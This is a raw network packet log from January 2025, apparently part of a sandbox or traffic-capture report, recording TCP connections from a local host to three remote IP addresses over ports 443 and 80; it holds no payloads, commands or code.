                                                                                                                                                                                              Jan 14, 2025 13:13:38.711617947 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.711625099 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.711647034 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.711664915 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801640034 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801666021 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801726103 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801748991 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801774025 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.801789999 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802164078 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802177906 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802234888 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802247047 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802292109 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802691936 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802711964 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802759886 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802771091 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.802810907 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803108931 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803123951 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803179979 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803189039 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803231955 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803644896 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803658962 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803719997 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803730011 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.803772926 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804022074 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804038048 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804085970 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804095030 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804133892 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804457903 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804472923 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804524899 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804537058 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804579973 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804852009 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804866076 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804918051 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804929972 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.804968119 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894002914 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894028902 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894100904 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894119024 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894165039 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894501925 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894519091 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894571066 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894582033 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.894664049 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895036936 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895054102 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895104885 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895112991 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895128012 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895148039 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895581961 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895597935 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895646095 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895653963 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895674944 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.895694017 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896038055 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896059036 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896111965 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896117926 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896147013 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896156073 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896467924 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896490097 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896537066 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896543980 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896560907 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896583080 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896820068 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896837950 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896891117 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896898031 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896915913 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.896938086 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.897252083 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.897269964 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.897325039 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.897334099 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.897371054 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986814976 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986845970 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986922979 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986958027 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986978054 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.986979008 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987003088 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987008095 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987016916 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987046003 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987077951 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987318993 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987334013 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987421989 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987428904 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987514973 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987584114 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987606049 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987669945 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987674952 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987713099 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987972021 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.987989902 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988022089 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988054991 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988059998 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988101006 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988177061 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988192081 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988230944 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988235950 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988276005 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988445044 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988460064 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988500118 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988506079 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988531113 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988543034 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988718987 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988733053 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988797903 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988802910 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.988846064 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079324961 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079351902 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079412937 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079447985 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079466105 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079493999 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079821110 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079843998 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079911947 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079919100 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.079961061 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080370903 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080394030 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080442905 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080450058 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080467939 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080491066 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080853939 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080881119 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080929041 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080934048 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080964088 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.080981970 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081160069 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081181049 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081228971 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081233978 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081252098 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081274033 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081527948 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081549883 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081605911 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081610918 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081651926 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081794977 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081834078 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081850052 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081856012 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081883907 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081885099 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.081921101 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.082189083 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:39.082206011 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.620126963 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:39.620182037 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:39.620378971 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:39.620654106 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:39.620670080 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.111006021 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.111089945 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.112754107 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.112766027 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.113038063 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.113874912 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.159326077 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.238753080 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.238821030 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.238894939 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.239223957 CET49966443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.239245892 CET44349966172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.240389109 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.240436077 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.240520000 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.240760088 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.240777969 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.715471029 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.717577934 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.717616081 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.718036890 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.718043089 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.860444069 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.860511065 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.860574961 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.898921013 CET49970443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:40.898940086 CET44349970172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.908756971 CET4997480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:40.913558960 CET8049974208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:40.913645983 CET4997480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:40.913767099 CET4997480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:40.918591976 CET8049974208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.387130022 CET8049974208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.387537003 CET4997480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:41.392507076 CET8049974208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.392573118 CET4997480192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:41.415260077 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:41.415306091 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.415378094 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:41.415613890 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:41.415630102 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.898015976 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.898525953 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:41.898559093 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:41.899099112 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:41.899106979 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.054056883 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.054109097 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.054383039 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.054533958 CET49978443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.054552078 CET44349978172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.055437088 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.055471897 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.056674004 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.056870937 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.056886911 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.508996010 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.509640932 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.509665012 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.510106087 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.510112047 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.656151056 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.656202078 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.656250000 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.656549931 CET49983443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:13:42.656568050 CET44349983172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.657604933 CET4998980192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:42.662463903 CET8049989208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:42.662617922 CET4998980192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:42.662889957 CET4998980192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:42.667727947 CET8049989208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:43.137644053 CET8049989208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:43.137985945 CET4998980192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:13:43.143388987 CET8049989208.95.112.1192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:43.143446922 CET4998980192.168.2.4208.95.112.1
                                                                                                                                                                                              Jan 14, 2025 13:14:34.512263060 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:34.512370110 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:34.512495995 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:34.524152040 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:34.524208069 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.011724949 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.011830091 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.013390064 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.013407946 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.013685942 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.059797049 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.073688030 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.115336895 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.187247038 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.187330961 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.187628984 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.187850952 CET50069443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.187870979 CET44350069172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.188951015 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.189011097 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.189095974 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.189320087 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.189352036 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.680207968 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.680895090 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.680960894 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.681385994 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.681400061 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.833266020 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.833342075 CET44350070172.67.74.152192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:14:35.833545923 CET50070443192.168.2.4172.67.74.152
                                                                                                                                                                                              Jan 14, 2025 13:14:35.833786964 CET50070443192.168.2.4172.67.74.152
